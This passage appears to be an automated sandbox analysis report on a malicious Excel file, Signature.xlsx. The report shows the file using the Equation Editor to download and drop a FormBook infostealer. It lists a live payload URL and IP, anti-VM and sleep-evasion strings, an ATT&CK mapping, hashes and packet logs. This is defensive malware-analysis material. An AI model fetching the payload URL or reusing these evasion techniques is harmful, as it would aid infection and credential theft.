Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 824	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1980	Thread sleep time: -52785s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Process Injection11	Masquerading111	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection11	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol21	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information11	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing2	Cached Domain Credentials	System Information Discovery13	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://18.194.54.219/wows/hm1.exe	7%	Virustotal		Browse
http://18.194.54.219/wows/hm1.exe	100%	Avira URL Cloud	malware
http://thesnake.herokuapp.com/snakes	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://18.194.54.219/wows/hm1.exe	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://thesnake.herokuapp.com/snakes	vbc.exe, vbc.exe, 00000005.00000002.2157599757.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2158308519.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000007.00000002.2159068648.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000008.00000002.2159827958.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000009.00000002.2161125989.0000000000212000.00000020.00020000.sdmp, vbc.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://www.day.com/dam/1.0	E74B891E.emf.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
18.194.54.219	unknown	United States		16509	AMAZON-02US	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	345177
Start date:	27.01.2021
Start time:	20:01:38
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Signature.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@14/6@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 6.7% (good quality ratio 0%) Quality average: 0% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 94% Number of executed functions: 13 Number of non-executed functions: 5
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe

Simulations

Behavior and APIs

Time	Type	Description
20:03:11	API Interceptor	35x Sleep call for process: EQNEDT32.EXE modified
20:03:13	API Interceptor	26x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	Doc_37584567499454.xlsx	Get hash	malicious	Browse	52.209.107.24
	Documentaci#U00f3n.doc	Get hash	malicious	Browse	35.163.191.195
	Rolled Alloys Possible Infection.docx	Get hash	malicious	Browse	143.204.11.47
	Order confirmation 64236000000025 26.01.2021.exe	Get hash	malicious	Browse	3.0.139.114
	Rolled Alloys Possible Infection.docx	Get hash	malicious	Browse	143.204.11.17
	ARCHIVOFile-20-012021.doc	Get hash	malicious	Browse	35.163.191.195
	FACTUUR-INV00012.xlsx	Get hash	malicious	Browse	52.216.237.43
	FACTUUR-INV00012.xlsx	Get hash	malicious	Browse	52.216.95.11
	daily scripts.exe	Get hash	malicious	Browse	34.242.129.172
	0113 INV_PAK.xlsx	Get hash	malicious	Browse	44.240.171.172
	wno5UOP8TJ.exe	Get hash	malicious	Browse	52.211.215.209
	quote20210126.exe.exe	Get hash	malicious	Browse	3.140.151.209
	PAYMENT.xlsx	Get hash	malicious	Browse	34.251.154.69
	PAYMENT.xlsx	Get hash	malicious	Browse	34.249.208.250
	DHL eMailShip delivery Form - securedPDF.html	Get hash	malicious	Browse	52.218.216.224
	5Ur5p5e8r2.exe	Get hash	malicious	Browse	13.52.79.18
	The Mental Health Center.xlsx	Get hash	malicious	Browse	52.216.245.238
	Inquiry_73834168_.xlsx	Get hash	malicious	Browse	3.131.104.217
	Xy4f5rcxOm.dll	Get hash	malicious	Browse	54.64.30.175
	New Year Inquiry List.xlsx	Get hash	malicious	Browse	13.224.102.114

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	633856
Entropy (8bit):	7.405346249644526
Encrypted:	false
SSDEEP:	12288:2PG5tVUOCqv9SdgIJCOhpMbs/oSmCy9XY3FGCr6:eG38WYZhyhCyA2
MD5:	BE84C387975B024F25DC96EC5F85F7BD
SHA1:	58507DE0E96B77F8030A4DC5BC607C438E14D5DA
SHA-256:	EBBCC767ACC5337309A6F0770C52236B131CBCFFB3E843E4BF132489CB2001CC
SHA-512:	1236A79CF26D69ABBC3330D38B1C14BD34A90B98960E5D974A990ED8078104B3F3BF2F84647F0A95B84C157CE1F8DBC30E4FE54ED49EA338DA17CB80B6D5BF59
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://18.194.54.219/wows/hm1.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Xm.`..............P.................. ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........~...A..........................................................0..#.......+.&...(....(..........(.....o.......................0..........+.&..8......8.....+5..Va.+...`a...SYE................M....5.+......&.3.+....6.+...OYE................'.../...7...E...N...h........4.+.+....+......&..8z.....(......8l......8d......8\.....(......8N.......8E.....(....+.(....8/.....8+.....(....+..8.......8........0..........+.&...+>..\a.+..._a8......\X+X.\(.....+...[YE........#...S..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B65EA87.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86CDB2DC.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E74B891E.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	653280
Entropy (8bit):	2.8986230323260216
Encrypted:	false
SSDEEP:	3072:r34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:D4UcLe0JOqQQZR8MDdATCR3tS+jqcC
MD5:	8BA96E01E5E31685B576653500058F22
SHA1:	03DCFA79713728B83AB0337CA70BA73715758B9A
SHA-256:	130D78C8E1A21DF3B25FE4461EFA7B13F505DCE5B6FDB51D982EE04181420C88
SHA-512:	528BA0091139824EE58678E138982DB1CBAB3CECAF7E02369DDDC329D8AB9E82D5F00A6BF3403B10D9D809E64C1037E44A65C3AD900C000EFAC133B75097F856
Malicious:	false
Reputation:	low
Preview:	....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................0...0.....P.0...0..N.SP.0.H.0.......0.4.0..N.SP.0.H.0. ....y.QH.0.P.0. ............z.Q............................................X...%...7...................{ .@................C.a.l.i.b.r...............0.X...H.0.\|.0..2.P..........0...0..{.P......0.....dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\Desktop\~$Signature.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	633856
Entropy (8bit):	7.405346249644526
Encrypted:	false
SSDEEP:	12288:2PG5tVUOCqv9SdgIJCOhpMbs/oSmCy9XY3FGCr6:eG38WYZhyhCyA2
MD5:	BE84C387975B024F25DC96EC5F85F7BD
SHA1:	58507DE0E96B77F8030A4DC5BC607C438E14D5DA
SHA-256:	EBBCC767ACC5337309A6F0770C52236B131CBCFFB3E843E4BF132489CB2001CC
SHA-512:	1236A79CF26D69ABBC3330D38B1C14BD34A90B98960E5D974A990ED8078104B3F3BF2F84647F0A95B84C157CE1F8DBC30E4FE54ED49EA338DA17CB80B6D5BF59
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Xm.`..............P.................. ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........~...A..........................................................0..#.......+.&...(....(..........(.....o.......................0..........+.&..8......8.....+5..Va.+...`a...SYE................M....5.+......&.3.+....6.+...OYE................'.../...7...E...N...h........4.+.+....+......&..8z.....(......8l......8d......8\.....(......8N.......8E.....(....+.(....8/.....8+.....(....+..8.......8........0..........+.&...+>..\a.+..._a8......\X+X.\(.....+...[YE........#...S..

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.996746245995192
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Signature.xlsx
File size:	2493440
MD5:	560a48512736572ec4abceb4ecf22250
SHA1:	56798f4c080101515e42b5678a2039ac6b8caaf3
SHA256:	1d93a4fcbcf81b40332da7aedaa9288ca16a2c0c588db5c78c6e349ce53478d4
SHA512:	52e6f40d303311a42e184835c734f0b482af35e38186202e46433c2251b9eb9d3d5c9a2aad25353193d6cf6bb5794212ace90a54cdd56fa6f6f647587bd69e4c
SSDEEP:	49152:XMzIKfCSJddchY7PRLJCLC3vX/UryBWs2yxNqbyj2FrwwV:2frJnQm9yC3P6GWsfAyj2mwV
File Content Preview:	........................>...................'...................................................................................\|.......~...............z.......\|.......~...............z.......\|.......~...............z.......\|..............................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Signature.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2469416

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	2469416
Entropy:	7.99993201198
Base64 Encoded:	True
Data ASCII:	. . % . . . . . . . . . . } . . . . . ? . 1 . . ~ . . . I . . p . o . . . @ . ) . . . . % . . . . ! . D . . . ~ . . . { a ' < . Z \\ . . ! \\ V = . k ) t P . . . G . . / . . z . . k ) t P . . . G . . / . . z . . k ) t P . . . G . . / . . z . . k ) t P . . . G . . / . . z . . k ) t P . . . G . . / . . z . . k ) t P . . . G . . / . . z . . k ) t P . . . G . . / . . z . . k ) t P . . . G . . / . . z . . k ) t P . . . G . . / . . z . . k ) t P . . . G . . / . . z . . k ) t P . . . G . . / . . z . . k ) t P . . .
Data Raw:	17 ae 25 00 00 00 00 00 9b e1 8b 05 f1 7d 80 d1 d9 a1 a6 3f 1c 31 fc e1 7e b4 f4 9b 49 f5 a6 70 a3 6f cd b3 18 40 9a 29 a8 da aa 82 25 93 82 9f 83 21 8f 44 a8 8e d1 7e e9 0a 08 7b 61 27 3c d5 5a 5c c4 e8 21 5c 56 3d af 6b 29 74 50 c2 a4 8e 47 da 0e 2f ac c0 7a d3 af 6b 29 74 50 c2 a4 8e 47 da 0e 2f ac c0 7a d3 af 6b 29 74 50 c2 a4 8e 47 da 0e 2f ac c0 7a d3 af 6b 29 74 50 c2 a4 8e

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.50739955561
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . B . . S . $ H . ) O . ' e . , . e K . ; 2 7 . . . . F . . , . u . . . . W . . # . / . 5 r u 0 . . . P . . > . w . M . . t . ~ . . . . k
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 20:03:03.171613932 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.212479115 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.212572098 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.212902069 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.254192114 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.254245996 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.254281998 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.254286051 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.254319906 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.254338026 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.254340887 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.254404068 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.295118093 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.295162916 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.295213938 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.295214891 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.295252085 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.295254946 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.295264006 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.295310974 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.295320988 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.295361042 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.295376062 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.295397043 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.295420885 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.295454979 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.295464039 CET	49165	80	192.168.2.22	18.194.54.219
